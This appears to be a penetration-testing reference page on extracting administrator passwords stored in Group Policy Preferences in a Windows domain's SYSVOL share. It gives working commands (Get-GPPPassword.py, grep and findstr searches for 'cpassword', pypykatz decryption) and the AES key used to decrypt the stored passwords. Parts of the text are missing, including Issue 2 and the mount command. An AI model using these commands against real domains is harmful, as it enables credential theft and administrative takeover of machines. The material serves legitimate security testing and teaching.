Group Policy Preferences
MITRE ATT&CK™ Sub-technique T1552.006
Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.
- Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.
- Issue 3: all Group Policies are stored in the Domain Controllers'
SYSVOLshare. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted.🤷♂
# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
# with cleartext credentials
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
Alternatively, searching for passwords can be done manually (or with Metasploit's
smb_enum_gppmodule), however it requires mounting the
SYSVOLshare, which can't be done through a docker environment unless it's run with privileged rights.
# create the target directory for the mount
sudo mkdir /tmp/sysvol
# mount the SYSVOL share
# recursively look for "cpassword" in Group Policies
sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null
# decrypt the string and recover the password
pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
This can also be achieved without tools, by "manually" looking for the
cpasswordstring in xml files and by then manually decrypting the matches.
findstr /S cpassword %logonserver%\sysvol\*.xml
The decryption process is as follows
1. decode from base64
2. decrypt from AES-256-CBC the following hex key/iv
Key : 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
IV : 0000000000000000000000000000000
3. decode from UTF-16LE